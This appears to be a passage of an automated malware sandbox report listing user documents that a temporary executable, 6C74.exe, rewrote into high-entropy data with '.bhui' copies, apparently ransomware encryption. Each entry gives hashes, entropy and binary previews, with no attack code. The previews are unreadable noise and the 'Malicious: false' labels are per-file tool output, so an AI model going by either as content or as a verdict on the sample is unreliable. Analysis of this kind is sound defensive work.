Entropy (8bit):	7.853251650137177
Encrypted:	false
SSDEEP:	24:Cze0sbK203o4hfwtrLxZoVhSVltw/zGIQw9+nGxa0iEwbElu+Nr+VWbD:N0ZLYdlVHw/yM9+nGSBEl7r+SD
MD5:	B0946459B216B16325D7B20B9CC3706B
SHA1:	9ACAB4B6105FC29757369E7CD4E5AE6AB29E86D3
SHA-256:	78BC59F14AD75AFB44B7C0CFE7DF4696506123BD4EA687BA5E2C99923354D36D
SHA-512:	B10630771629A13188053C49234FF9469A80597A59288633150CA22A0DC8BC89946A7BF5FC0B1D8ACF969303B98EDB26801AA753725C872DD58815D8BC6B8387
Malicious:	false
Reputation:	unknown
Preview:	SNIPGD(....%.(...e>.....G......e%e.!...SI.}7L.c....E..=.Q......k.bW.$m..(2..0..U..$..TGNt.6.`.0Cw....]..?,....N.dKV..D..i.IXy.6Q5.R..'..R.Nr....\t.'.m..G... ..s...Q.bd...&_<2..l...Q?y.o.';.....R...d\|r.......y2xw...E..T...Q.Z..j.\|g.pe.p.m.......f.N..!......B,..6.=....`..7w.$....$.Nn......=;.)..mP......_...-........a...]!)F.\...'.tzQ.q. .....D..0.....tp.7V..qG.T..sg#..C...3/..P...p....Q..aB;..mn.l.e4..U.=...\|.............aVpmW....T~..[......!..LU5.s...g....G...4..mc.".....a.........z..vd....2=-...i.+..S....6i...3H.....aa;..y...Pyo..w7:I.5f.m...Bi.U.....e......{..S)......9S!O..\|..\|..."...vx.B4y`.q. ...fC...:6gG.x...}.I.H.&.?.}^m....K.....S1..P.e..Q'.t...mW........._.n..L.)]......... w4.`/..L.b,]P..Mh..-c.K..}...<'.rNv..2&.q..\..9m..`8..V;.d......4...N..X6...$..>.~Y5N.... ...i.n.&\|\|qn.E.I\|Ds...I.\I.....T.Q....g...h9....W.n.......=.k.2..y..R#.X..a...b..C...L.g.;R.....l.C#....&.<.A].^..$...^..3...S....@..S......1}(......(Z#<..'L.C.....U..8.9

C:\Users\user\Documents\SNIPGPPREP.png.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.853251650137177
Encrypted:	false
SSDEEP:	24:Cze0sbK203o4hfwtrLxZoVhSVltw/zGIQw9+nGxa0iEwbElu+Nr+VWbD:N0ZLYdlVHw/yM9+nGSBEl7r+SD
MD5:	B0946459B216B16325D7B20B9CC3706B
SHA1:	9ACAB4B6105FC29757369E7CD4E5AE6AB29E86D3
SHA-256:	78BC59F14AD75AFB44B7C0CFE7DF4696506123BD4EA687BA5E2C99923354D36D
SHA-512:	B10630771629A13188053C49234FF9469A80597A59288633150CA22A0DC8BC89946A7BF5FC0B1D8ACF969303B98EDB26801AA753725C872DD58815D8BC6B8387
Malicious:	false
Reputation:	unknown
Preview:	SNIPGD(....%.(...e>.....G......e%e.!...SI.}7L.c....E..=.Q......k.bW.$m..(2..0..U..$..TGNt.6.`.0Cw....]..?,....N.dKV..D..i.IXy.6Q5.R..'..R.Nr....\t.'.m..G... ..s...Q.bd...&_<2..l...Q?y.o.';.....R...d\|r.......y2xw...E..T...Q.Z..j.\|g.pe.p.m.......f.N..!......B,..6.=....`..7w.$....$.Nn......=;.)..mP......_...-........a...]!)F.\...'.tzQ.q. .....D..0.....tp.7V..qG.T..sg#..C...3/..P...p....Q..aB;..mn.l.e4..U.=...\|.............aVpmW....T~..[......!..LU5.s...g....G...4..mc.".....a.........z..vd....2=-...i.+..S....6i...3H.....aa;..y...Pyo..w7:I.5f.m...Bi.U.....e......{..S)......9S!O..\|..\|..."...vx.B4y`.q. ...fC...:6gG.x...}.I.H.&.?.}^m....K.....S1..P.e..Q'.t...mW........._.n..L.)]......... w4.`/..L.b,]P..Mh..-c.K..}...<'.rNv..2&.q..\..9m..`8..V;.d......4...N..X6...$..>.~Y5N.... ...i.n.&\|\|qn.E.I\|Ds...I.\I.....T.Q....g...h9....W.n.......=.k.2..y..R#.X..a...b..C...L.g.;R.....l.C#....&.<.A].^..$...^..3...S....@..S......1}(......(Z#<..'L.C.....U..8.9

C:\Users\user\Documents\VWDFPKGDUF.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.849126155490259
Encrypted:	false
SSDEEP:	24:YEhuxHzxlDyyUTUwAb/cbeTaWqJunwXyEMreJfYdy8DAaBNBm6PyqsJtSWbD:1EzxlgUwAb/cSTahiEK8alNWD
MD5:	C4AE45C91DDFE6C1CD783540B33FD9CE
SHA1:	C3675F14D5C9CDC4C337FDDDE29138DAC5DB4020
SHA-256:	097CAEDC9B67FAD1E6EBCECF6C9AA5D7EC12C82BCE31FB8ECBE80794E5DE2F4E
SHA-512:	1A2CD9022838CE65EA17D2E11DCA1A9E11698A48BDB5B2ED729841EB27A95C0F237D86BACDE08DFA19C9E629F59D9BC408FD51A96849247312AEA6601C47B564
Malicious:	false
Reputation:	unknown
Preview:	VWDFP....r..V#.v.`.(......U...../.^......}j~.)2....NQ..p..h. .oA"\./b...P....E.~..$<.z.._.L..Y...+..L^..j........j....(A.HXl7+.`....BB.w.}..0..[..;M........"...u.`r..D.-'.u.?....s..!.3.\|O...[...z.3...m. ...]..\|.0.U=.......A/\|..lk.../&..X.__(....]..51`n.`>..g.o.h.%kq.UZ....X7.Mv."J.RL....\.Dm..n..C@.9.b.^..~Ne...u..NI....v.q8)..,....c...]..B.......6...L.C..r:+.?u........]O....S...Cc..= .1..e..>.:...l].e....>,...)w...6....Gt...r..U...ps/.....W..e.)...4ETi.b......i6.,ji.mlQ.Pq...e.@!....:.yN. ^..7..eW#..0...>-...."... .3......G.r.h.......c.i4b.?q.@~.h...kkY!...`.]...4b..@...t...Zd.5.L0....%..]..I...4.C....a..?..o.m..32sU...3,L@.....r.-....t.K2.'.'.....$5..9.(.........T..l...G..{..1.S.g4..;D.[^..,..M.....s"...&.DDD.+s.Iwd..}.7n...u..O.K.8.D`......i.g3..$...)...<....V.Dfs...m...........@.{....,....l..!.X........Mv....8..J.`...dd.....Ca...;.A.t......._.!.@bO..i.lA..5...c... ...."*B.lN..M........\|.,9u....X...p5...<...L^..U.q`...C....W.,...

C:\Users\user\Documents\VWDFPKGDUF.jpg.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.849126155490259
Encrypted:	false
SSDEEP:	24:YEhuxHzxlDyyUTUwAb/cbeTaWqJunwXyEMreJfYdy8DAaBNBm6PyqsJtSWbD:1EzxlgUwAb/cSTahiEK8alNWD
MD5:	C4AE45C91DDFE6C1CD783540B33FD9CE
SHA1:	C3675F14D5C9CDC4C337FDDDE29138DAC5DB4020
SHA-256:	097CAEDC9B67FAD1E6EBCECF6C9AA5D7EC12C82BCE31FB8ECBE80794E5DE2F4E
SHA-512:	1A2CD9022838CE65EA17D2E11DCA1A9E11698A48BDB5B2ED729841EB27A95C0F237D86BACDE08DFA19C9E629F59D9BC408FD51A96849247312AEA6601C47B564
Malicious:	false
Reputation:	unknown
Preview:	VWDFP....r..V#.v.`.(......U...../.^......}j~.)2....NQ..p..h. .oA"\./b...P....E.~..$<.z.._.L..Y...+..L^..j........j....(A.HXl7+.`....BB.w.}..0..[..;M........"...u.`r..D.-'.u.?....s..!.3.\|O...[...z.3...m. ...]..\|.0.U=.......A/\|..lk.../&..X.__(....]..51`n.`>..g.o.h.%kq.UZ....X7.Mv."J.RL....\.Dm..n..C@.9.b.^..~Ne...u..NI....v.q8)..,....c...]..B.......6...L.C..r:+.?u........]O....S...Cc..= .1..e..>.:...l].e....>,...)w...6....Gt...r..U...ps/.....W..e.)...4ETi.b......i6.,ji.mlQ.Pq...e.@!....:.yN. ^..7..eW#..0...>-...."... .3......G.r.h.......c.i4b.?q.@~.h...kkY!...`.]...4b..@...t...Zd.5.L0....%..]..I...4.C....a..?..o.m..32sU...3,L@.....r.-....t.K2.'.'.....$5..9.(.........T..l...G..{..1.S.g4..;D.[^..,..M.....s"...&.DDD.+s.Iwd..}.7n...u..O.K.8.D`......i.g3..$...)...<....V.Dfs...m...........@.{....,....l..!.X........Mv....8..J.`...dd.....Ca...;.A.t......._.!.@bO..i.lA..5...c... ...."*B.lN..M........\|.,9u....X...p5...<...L^..U.q`...C....W.,...

C:\Users\user\Documents\VWDFPKGDUF.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.87929585573919
Encrypted:	false
SSDEEP:	24:24ytJvDS+o0gYF9Epkh8MV5JhQEU9CinlrZysJ/RZyNVh4FU8ne1EktkjDUPWbD:24mJvVo0gYFTX5nQpCinpJ/RAh4vn4EV
MD5:	64B9E3F2EF74AAC241ECFE2E706BE372
SHA1:	79B9D1297BCB00BF9F00D0B24C2618A8D0D452EF
SHA-256:	2AC39A6D818CB4212666141F182B60C233069A1AB96D3D16010D2D7C5878B081
SHA-512:	9540D4665A04B4B4606A780126DC8385F767811C0F118D83045DC66A3B58B00A73E3BCAB6FF42F30F99DFB149CB4F2184D115AD1A898B3DB396D501B5B5B0E92
Malicious:	false
Reputation:	unknown
Preview:	VWDFP..M=..%.I.T...g".;..A...8').y.u.y...Y.^..".P....Wj....!.+q.8&....9...."e.v.c].X.q...6..T.z.......V..A.dp...?m....(...t\|..........[..FJ#v.4 ..C)2.2.?F...Q...T..:..."R...f.......}.P#...I.+s..b..\zZ@.....R.s.>.q.~.&O\|.&..H.@................u.bu....1F?..g..5.<.MG..h...).+...K........f.&."....T...P.[...&0..'..G.b..<~0.Q.b..(...K.,\p3.....!..6V....s.:.].r0~3.D:@.0'..i".......x")....j....&w.#g2}L.......N..-.$......t)..c.h.n...g0S..n........b.j...Ur.........I.._\|....h}....q....m......(.R...<.<.(..Qt\|..Jl];.R..1..........B...\.!?....m..Fr.a.d.v...[..C....\|.]8....i.....J8...Sl..e.oO]v..H..........b.N.-......R.-..r..B{@PK......t.cm....d......I.L..=....v.>........u..C...yo....x...G.fq.A.E.bjh.}......:V.. C.Y.V...1....F.Gt..,...A..N.z..#...:.2~.S.VA...r.4.eKmo......0 .mo[8./....v.....I.y+.s(.$...'.'YGX.K...Ec=.C]..lL u+.k...u...^....N..]a...JO...q.]...i...v/..r.X...s...V'.nV.....t..."(...%.....<..<c.7..W...q/W.....:.F.).....u...._..~.w......

C:\Users\user\Documents\VWDFPKGDUF.mp3.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.87929585573919
Encrypted:	false
SSDEEP:	24:24ytJvDS+o0gYF9Epkh8MV5JhQEU9CinlrZysJ/RZyNVh4FU8ne1EktkjDUPWbD:24mJvVo0gYFTX5nQpCinpJ/RAh4vn4EV
MD5:	64B9E3F2EF74AAC241ECFE2E706BE372
SHA1:	79B9D1297BCB00BF9F00D0B24C2618A8D0D452EF
SHA-256:	2AC39A6D818CB4212666141F182B60C233069A1AB96D3D16010D2D7C5878B081
SHA-512:	9540D4665A04B4B4606A780126DC8385F767811C0F118D83045DC66A3B58B00A73E3BCAB6FF42F30F99DFB149CB4F2184D115AD1A898B3DB396D501B5B5B0E92
Malicious:	false
Reputation:	unknown
Preview:	VWDFP..M=..%.I.T...g".;..A...8').y.u.y...Y.^..".P....Wj....!.+q.8&....9...."e.v.c].X.q...6..T.z.......V..A.dp...?m....(...t\|..........[..FJ#v.4 ..C)2.2.?F...Q...T..:..."R...f.......}.P#...I.+s..b..\zZ@.....R.s.>.q.~.&O\|.&..H.@................u.bu....1F?..g..5.<.MG..h...).+...K........f.&."....T...P.[...&0..'..G.b..<~0.Q.b..(...K.,\p3.....!..6V....s.:.].r0~3.D:@.0'..i".......x")....j....&w.#g2}L.......N..-.$......t)..c.h.n...g0S..n........b.j...Ur.........I.._\|....h}....q....m......(.R...<.<.(..Qt\|..Jl];.R..1..........B...\.!?....m..Fr.a.d.v...[..C....\|.]8....i.....J8...Sl..e.oO]v..H..........b.N.-......R.-..r..B{@PK......t.cm....d......I.L..=....v.>........u..C...yo....x...G.fq.A.E.bjh.}......:V.. C.Y.V...1....F.Gt..,...A..N.z..#...:.2~.S.VA...r.4.eKmo......0 .mo[8./....v.....I.y+.s(.$...'.'YGX.K...Ec=.C]..lL u+.k...u...^....N..]a...JO...q.]...i...v/..r.X...s...V'.nV.....t..."(...%.....<..<c.7..W...q/W.....:.F.).....u...._..~.w......

C:\Users\user\Documents\VWDFPKGDUF.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.866234259337357
Encrypted:	false
SSDEEP:	24:lj/jAtOWVKG5e+SgvTbiRoSdiCKIdYJLJRjVn3LzV/qK+lWbD:ljMd8+SgvyoSd0Id4JRxfN7VD
MD5:	69318C176CCE0A532BD4708C27DE6797
SHA1:	91019FDCE9CC5CA99343F2D036060DCB4A122DE5
SHA-256:	2F123497DF92275E5B8865360CF295F1434B9E16716BC558C002FFC9A60C9504
SHA-512:	3AFBA68AE5EB5880B91E3A1B2ACDFDCC7CF61F261336FB465F4AFC21D8C3A7E024CB1D993E43B86321E1203E4B8F569D273E43E9A81026FD0BD4A03604BE8C65
Malicious:	false
Reputation:	unknown
Preview:	VWDFP+.....m".....t.W.^...5U......%..p\|U7.".. ;L..?.Y...+mj.........F......E.....n.c..i[.._...Ro ..U...'+.@.....)),.C.j.Q.....Zs.d.....P.'.+..;.)...b..h...,....F.......ug...\.+"...Y.U_t.........w..0_..S..7...E.!...F..R........,.:.!.<.v.:...p.....<.........jN......:..:D.g.$..-......1I........h@..u{.0....[..un9.Y..>+.Pq/..Z(.1..)1.....o.YLJ..y...4&1u..'1Z...)\...t..E\A...." .U..w....k.\|. .}.v.......?.$.B`.D8..w% ......Z.'+.ol.....E....Y...":.>.&...F..$..YE...w.=.q.~.}v..(.&!..k.......^O+......<>.V..;`..~..d......tN.-..\|..<\|f......J.?.J.i..{..x.h.....a..7.X....T....v.@.L ].\|g/z.j#Qk.;..o.....%eu.3.}.L.M.XI.=..}....\.'.1].\{\|.....gM..........=.r..8ZYI.j.>)$.n]C.O.W....LK..V.(.....&R..}...;..p'.9..%O.}..-...(........e...J..AW..t...~.9....<.O...............^..h.lQo....Bl.3.f..6=.5W.hl!f.w.....{...T..RM.>E%46..>.q.....T.G.#..ps.},..{...HO]N.(..........w0.EGz.})Mr... -_.l+..w..c.7}.-].+....R.....R...v....J..{...[...L..w.(.4.P..

C:\Users\user\Documents\VWDFPKGDUF.pdf.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.866234259337357
Encrypted:	false
SSDEEP:	24:lj/jAtOWVKG5e+SgvTbiRoSdiCKIdYJLJRjVn3LzV/qK+lWbD:ljMd8+SgvyoSd0Id4JRxfN7VD
MD5:	69318C176CCE0A532BD4708C27DE6797
SHA1:	91019FDCE9CC5CA99343F2D036060DCB4A122DE5
SHA-256:	2F123497DF92275E5B8865360CF295F1434B9E16716BC558C002FFC9A60C9504
SHA-512:	3AFBA68AE5EB5880B91E3A1B2ACDFDCC7CF61F261336FB465F4AFC21D8C3A7E024CB1D993E43B86321E1203E4B8F569D273E43E9A81026FD0BD4A03604BE8C65
Malicious:	false
Reputation:	unknown
Preview:	VWDFP+.....m".....t.W.^...5U......%..p\|U7.".. ;L..?.Y...+mj.........F......E.....n.c..i[.._...Ro ..U...'+.@.....)),.C.j.Q.....Zs.d.....P.'.+..;.)...b..h...,....F.......ug...\.+"...Y.U_t.........w..0_..S..7...E.!...F..R........,.:.!.<.v.:...p.....<.........jN......:..:D.g.$..-......1I........h@..u{.0....[..un9.Y..>+.Pq/..Z(.1..)1.....o.YLJ..y...4&1u..'1Z...)\...t..E\A...." .U..w....k.\|. .}.v.......?.$.B`.D8..w% ......Z.'+.ol.....E....Y...":.>.&...F..$..YE...w.=.q.~.}v..(.&!..k.......^O+......<>.V..;`..~..d......tN.-..\|..<\|f......J.?.J.i..{..x.h.....a..7.X....T....v.@.L ].\|g/z.j#Qk.;..o.....%eu.3.}.L.M.XI.=..}....\.'.1].\{\|.....gM..........=.r..8ZYI.j.>)$.n]C.O.W....LK..V.(.....&R..}...;..p'.9..%O.}..-...(........e...J..AW..t...~.9....<.O...............^..h.lQo....Bl.3.f..6=.5W.hl!f.w.....{...T..RM.>E%46..>.q.....T.G.#..ps.},..{...HO]N.(..........w0.EGz.})Mr... -_.l+..w..c.7}.-].+....R.....R...v....J..{...[...L..w.(.4.P..

C:\Users\user\Documents\ZIPXYXWIOY.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.869346120914063
Encrypted:	false
SSDEEP:	24:0tto53DnExs+GjT16lLGqfYNAH66R8xxx72zlKBx80ADN+bsx0onWbD:0s5TnUCFAGCYNABR8d2BSOtDN+FD
MD5:	C0C6A562B3EDDC9A10805AD51C1C7D49
SHA1:	63897F8025B5F4836C7734E8A335A27CFBE31B0D
SHA-256:	2795C7B8F46779CC596343EBD224345802A9F77C7ABECA5C8E035275E095A6C1
SHA-512:	0FAA2ACE6104BB1F9A73596F07DC651643F634217A73718F324B4EF62718ADFE5A7F5D1DCF3951A025E56E3EA0E7E6C250CDB7B7F66D98B96187C5FA4D8102E2
Malicious:	false
Reputation:	unknown
Preview:	ZIPXY.<i....\....G.x....(].z!<v.#L3..._<......o..G.......wk.(..."s....7M....?...I93.h...V.z...h.1v.,.S..5.;y....g..I#s^/..M=U..r.9..n.W..Z.P.=..~G...v,.V..l &>/.P.p..g....9.=d..k.1.....Iu).u.&:f.......5.Hs.?..."..iy....jO.Y<..L..%..{..L.[.....$..C...x.....I.<....C...a.>..V.d.......\|...6~.hF...b.\....q..-...H.}... 8..2..<.\.@6...A(.Hsg-.GT.C.Kb...5.......d8..KW.q/.#.5..'.....\|u7U.}..c]rm...L..F.]...5V.H .b....T^...............(cRy..S...."...Y/&w......%Tt.h..Y.B......0&c;........t.Q.....%...C[.e.S..../N.\'z....T..O..+n..c..";4...@..uE........V.)<...O..8.02}.t..a'.u.....>..h.......\|....L=..c..z..$.y..m.(Z......dl.....<....$r9.6.F-SI.k\;?G..M0._.H.....T K.+...Dgg..7..8WvN.x.Su.T.mv8.v..._s.........Y&....zl...c.....!.....a.........3....`Xi.{...Z..9'G.p..p[..0...xX.b3..f....'..x.g.....[..3.$v.>..v...n...q....Y.o....<.zU...q...!..=.fI.](..L.....q..D..eH.7#....19W.Ys....>....Qt...\|].d.V.bEk%.,...;.......OL.t.5i..\.p5y.\p....{K...<.o..k.....

C:\Users\user\Documents\ZIPXYXWIOY.docx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.869346120914063
Encrypted:	false
SSDEEP:	24:0tto53DnExs+GjT16lLGqfYNAH66R8xxx72zlKBx80ADN+bsx0onWbD:0s5TnUCFAGCYNABR8d2BSOtDN+FD
MD5:	C0C6A562B3EDDC9A10805AD51C1C7D49
SHA1:	63897F8025B5F4836C7734E8A335A27CFBE31B0D
SHA-256:	2795C7B8F46779CC596343EBD224345802A9F77C7ABECA5C8E035275E095A6C1
SHA-512:	0FAA2ACE6104BB1F9A73596F07DC651643F634217A73718F324B4EF62718ADFE5A7F5D1DCF3951A025E56E3EA0E7E6C250CDB7B7F66D98B96187C5FA4D8102E2
Malicious:	false
Reputation:	unknown
Preview:	ZIPXY.<i....\....G.x....(].z!<v.#L3..._<......o..G.......wk.(..."s....7M....?...I93.h...V.z...h.1v.,.S..5.;y....g..I#s^/..M=U..r.9..n.W..Z.P.=..~G...v,.V..l &>/.P.p..g....9.=d..k.1.....Iu).u.&:f.......5.Hs.?..."..iy....jO.Y<..L..%..{..L.[.....$..C...x.....I.<....C...a.>..V.d.......\|...6~.hF...b.\....q..-...H.}... 8..2..<.\.@6...A(.Hsg-.GT.C.Kb...5.......d8..KW.q/.#.5..'.....\|u7U.}..c]rm...L..F.]...5V.H .b....T^...............(cRy..S...."...Y/&w......%Tt.h..Y.B......0&c;........t.Q.....%...C[.e.S..../N.\'z....T..O..+n..c..";4...@..uE........V.)<...O..8.02}.t..a'.u.....>..h.......\|....L=..c..z..$.y..m.(Z......dl.....<....$r9.6.F-SI.k\;?G..M0._.H.....T K.+...Dgg..7..8WvN.x.Su.T.mv8.v..._s.........Y&....zl...c.....!.....a.........3....`Xi.{...Z..9'G.p..p[..0...xX.b3..f....'..x.g.....[..3.$v.>..v...n...q....Y.o....<.zU...q...!..=.fI.](..L.....q..D..eH.7#....19W.Ys....>....Qt...\|].d.V.bEk%.,...;.......OL.t.5i..\.p5y.\p....{K...<.o..k.....

C:\Users\user\Documents\ZIPXYXWIOY.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.830760332982065
Encrypted:	false
SSDEEP:	24:KWBHb3hdfeE2FmUgrRMenZpwIL0rf4/6gihG5t7Hq3tGXGySexIq76K3Wxlp7hWX:LtUmr9lLef4/niQ5t7grymquoW/p7+D
MD5:	81C060EA8A181928D499EC75E34FAC3D
SHA1:	2EA04C6F06DC0FFE84DE7BE7AF09DD7C50E5EDBF
SHA-256:	88C0A1BAFA2EF5ED0C9C967FB8A80068DF5453FB004C805487A21BF13D99F31A
SHA-512:	D7F868521EEDDCEB0BDC3235197333EA13F5BFB0974D60629989B4D25F8DAF560B07838981FDB3AD4DEB2888AA923E73B4E4FC83D9BD9AE896E7B5DEFA0B48E0
Malicious:	false
Reputation:	unknown
Preview:	ZIPXYS..A.v.X_E..$....A.\..T..3.......X.....;1..../...uT.R....9>..0G.......8C........c.h+.............v......].y.J.?..A.?.E...~..\|B...KYcF...6?..x~..<F3A.]P.b......\|...):.............$.P...-..s.+...~.5.P.PP.m..t.*1.w.....[.olp...I{..........k..Vb..xC...F..@.#$.,...F....I......$.\|.Lo.eo..B...E.....g.\|...#..SN\|<.W.....V...E..},W)................. \|Pw..)....db(t...g......!.]...<<..5U.lv..uj.z.i.~.1tUgHD.^...Cboh...%.&.g.>n..3....\H>u.Y.U....L.2..........:....z!x.9x&cjq{-=.tzc...#....C..Nb../U.vg.u...t2P.c..).-:.PX... ....p..\|.B..Oyl.dH.hi.,.....B.MKp.R.P...a..P>N......:.wD..(.@at.U.x......3...........c.iMl.4-d....5.!..,.h....m...I..C..n....b...J.^`".~i. l.%.....C.7.A.a.."....e....;xA...?......]..w..;mrn..5..O,.L{.$H...,.K.<....s8..._N?f.c..-x..~v7...%,..P+f.........~.n.....$..%T..z.`...w.Ib.z...d..6..j.c..h.c.]..W.?..5.C>../.>..h..........?...p...io..g..`.MP6./.Jm."Vq..!...........bl...Zh?E,..Q..u1.g3.."....r._q...n.,....n.E....[Z..P....z>..8D

C:\Users\user\Documents\ZIPXYXWIOY.pdf.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.830760332982065
Encrypted:	false
SSDEEP:	24:KWBHb3hdfeE2FmUgrRMenZpwIL0rf4/6gihG5t7Hq3tGXGySexIq76K3Wxlp7hWX:LtUmr9lLef4/niQ5t7grymquoW/p7+D
MD5:	81C060EA8A181928D499EC75E34FAC3D
SHA1:	2EA04C6F06DC0FFE84DE7BE7AF09DD7C50E5EDBF
SHA-256:	88C0A1BAFA2EF5ED0C9C967FB8A80068DF5453FB004C805487A21BF13D99F31A
SHA-512:	D7F868521EEDDCEB0BDC3235197333EA13F5BFB0974D60629989B4D25F8DAF560B07838981FDB3AD4DEB2888AA923E73B4E4FC83D9BD9AE896E7B5DEFA0B48E0
Malicious:	false
Reputation:	unknown
Preview:	ZIPXYS..A.v.X_E..$....A.\..T..3.......X.....;1..../...uT.R....9>..0G.......8C........c.h+.............v......].y.J.?..A.?.E...~..\|B...KYcF...6?..x~..<F3A.]P.b......\|...):.............$.P...-..s.+...~.5.P.PP.m..t.*1.w.....[.olp...I{..........k..Vb..xC...F..@.#$.,...F....I......$.\|.Lo.eo..B...E.....g.\|...#..SN\|<.W.....V...E..},W)................. \|Pw..)....db(t...g......!.]...<<..5U.lv..uj.z.i.~.1tUgHD.^...Cboh...%.&.g.>n..3....\H>u.Y.U....L.2..........:....z!x.9x&cjq{-=.tzc...#....C..Nb../U.vg.u...t2P.c..).-:.PX... ....p..\|.B..Oyl.dH.hi.,.....B.MKp.R.P...a..P>N......:.wD..(.@at.U.x......3...........c.iMl.4-d....5.!..,.h....m...I..C..n....b...J.^`".~i. l.%.....C.7.A.a.."....e....;xA...?......]..w..;mrn..5..O,.L{.$H...,.K.<....s8..._N?f.c..-x..~v7...%,..P+f.........~.n.....$..%T..z.`...w.Ib.z...d..6..j.c..h.c.]..W.?..5.C>../.>..h..........?...p...io..g..`.MP6./.Jm."Vq..!...........bl...Zh?E,..Q..u1.g3.."....r._q...n.,....n.E....[Z..P....z>..8D

C:\Users\user\Documents\ZIPXYXWIOY\GLTYDMDUST.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.863562053252277
Encrypted:	false
SSDEEP:	24:yWf/xU98T6t6E5+WkF/vpBvvrI/z96v65cslehMuCKImruve0XWA2mOPiWbD:yQVW8E5S3/vkwS8pC9HeNAH0D
MD5:	56F733D744190A2FC3ABB73BC1B7A1FB
SHA1:	1590B8F7E3C376F0A349D9A49D5F0A6334953DEB
SHA-256:	C10F6815FBD56BE61DCEA9CE95D34B51089C980730F9069D27D5F4EBA50CE527
SHA-512:	EC778F6FCC0BC552D31094894B783776DCF72920B93FA4E045C17CB68EF226438DAA7A6EF28457FBDE529036491351451C5D11A25F4892815EE6DD609DD050E2
Malicious:	false
Reputation:	unknown
Preview:	GLTYDa..._O.!y.6.v)F.c..4.....7uJ .[..5xTf..o).dT..o._0.;..T]:.......@C.p7`...;.Is.W.t...>...../.%..bV.'.;..o#...4.a......_.5.^.....(.:...=..\|.. M...1.5Oiom...s...=....tL'}.T\|DZ...M..8.......FYQ.8.mv`.......B.I.\|ux..S.B..\..f..Z...{g(2....,6..gY.AN..g.....8.8....H...3.7.H......K\|.7...N.{Ng$...~.ah....$O.B'A...-XV.JRt...8...l)&<#.#..g...z...!.5]...@...j.{..6._,.V`..9...P^7....f-.<t.........V."...*."...^..T..X..q.....e......\|'..............p.^.dSZ~&=\|....g.^..9..<....Z'.EEBY\#.&.X2/.~U...T....l.P.`..t2.p...E.......M.C.u....3.....k.#....[.....rg...b..2...^....y.y+...5...v3......,...\|b.......]..k.g...1P.6-..!.%.eJ..4..S.<.f.o.sK..`.....u..Z`..d..;...\R...J"....d.~.'U...f.S.........w...ff..O$....)...m.q.9/+...$!4..`..\|y....C........W.+..h..2.46.,..b....Q.%b...7U..u.....K.L.o.\.7........~+.m.. p..-j;...D6y...=....XL.;.uf[U....+vI.F...-.sYui......&..z.2.>....L.\W_...2.RV..H.k..$.t.._.tw]..J>$.....-.o....pgM...~3...>.F..aH.c..;..O.[.\C.s.

C:\Users\user\Documents\ZIPXYXWIOY\GLTYDMDUST.xlsx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.863562053252277
Encrypted:	false
SSDEEP:	24:yWf/xU98T6t6E5+WkF/vpBvvrI/z96v65cslehMuCKImruve0XWA2mOPiWbD:yQVW8E5S3/vkwS8pC9HeNAH0D
MD5:	56F733D744190A2FC3ABB73BC1B7A1FB
SHA1:	1590B8F7E3C376F0A349D9A49D5F0A6334953DEB
SHA-256:	C10F6815FBD56BE61DCEA9CE95D34B51089C980730F9069D27D5F4EBA50CE527
SHA-512:	EC778F6FCC0BC552D31094894B783776DCF72920B93FA4E045C17CB68EF226438DAA7A6EF28457FBDE529036491351451C5D11A25F4892815EE6DD609DD050E2
Malicious:	false
Reputation:	unknown
Preview:	GLTYDa..._O.!y.6.v)F.c..4.....7uJ .[..5xTf..o).dT..o._0.;..T]:.......@C.p7`...;.Is.W.t...>...../.%..bV.'.;..o#...4.a......_.5.^.....(.:...=..\|.. M...1.5Oiom...s...=....tL'}.T\|DZ...M..8.......FYQ.8.mv`.......B.I.\|ux..S.B..\..f..Z...{g(2....,6..gY.AN..g.....8.8....H...3.7.H......K\|.7...N.{Ng$...~.ah....$O.B'A...-XV.JRt...8...l)&<#.#..g...z...!.5]...@...j.{..6._,.V`..9...P^7....f-.<t.........V."...*."...^..T..X..q.....e......\|'..............p.^.dSZ~&=\|....g.^..9..<....Z'.EEBY\#.&.X2/.~U...T....l.P.`..t2.p...E.......M.C.u....3.....k.#....[.....rg...b..2...^....y.y+...5...v3......,...\|b.......]..k.g...1P.6-..!.%.eJ..4..S.<.f.o.sK..`.....u..Z`..d..;...\R...J"....d.~.'U...f.S.........w...ff..O$....)...m.q.9/+...$!4..`..\|y....C........W.+..h..2.46.,..b....Q.%b...7U..u.....K.L.o.\.7........~+.m.. p..-j;...D6y...=....XL.;.uf[U....+vI.F...-.sYui......&..z.2.>....L.\W_...2.RV..H.k..$.t.._.tw]..J>$.....-.o....pgM...~3...>.F..aH.c..;..O.[.\C.s.

C:\Users\user\Documents\ZIPXYXWIOY\LHEPQPGEWF.mp3

Download File

